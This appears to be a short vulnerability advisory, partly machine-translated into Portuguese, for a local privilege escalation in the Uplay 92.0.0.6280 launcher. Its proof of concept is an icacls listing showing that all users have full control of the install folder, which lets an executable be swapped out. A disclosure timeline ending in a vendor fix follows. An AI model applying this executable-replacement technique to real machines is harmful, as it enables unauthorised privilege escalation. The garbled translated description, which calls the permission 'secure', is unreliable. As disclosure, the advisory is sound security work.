Uplay 92.0.0.6280 – Local Privilege Escalation
# Exploit Title: Uplay 92.0.0.6280 – Escalonamento de privilégios locais
# Data: 2019-08-07
# Exploit Autor: Kusol Watchara-Apanukorn, Pongtorn Angsuchotmetee, Manich Koomsusi
# Página inicial do fornecedor: https://uplay.ubisoft.com/
# Versão: 92.0.0.6280
# Testado em: Windows 10 x64
# CVE: N / D
# Descrição da vulnerabilidade: “C: \ Arquivos de Programas (x86) \ Ubisoft \ Ubisoft Game Launcher” tem uma permissão segura
# que permite que todos os BUILTIN-USER tenham permissão total. Um invasor substitui o
# vulnerability executa arquivo com arquivo malicioso.
///////////////////////
Proof of Concept
///////////////////////
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>icacls "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher"
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher BUILTIN\Users:(F)
BUILTIN\Users:(OI)(CI)(IO)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
Vulnerability Disclosure Timeline:
==================================
07 Aug, 19 : Found Vulnerability
07 Aug, 19 : Vendor Notification
14 Aug, 19 : Vendor Response
18 Sep, 19 : Vendor Fixed
18 Sep, 19 : Vendor released new patched
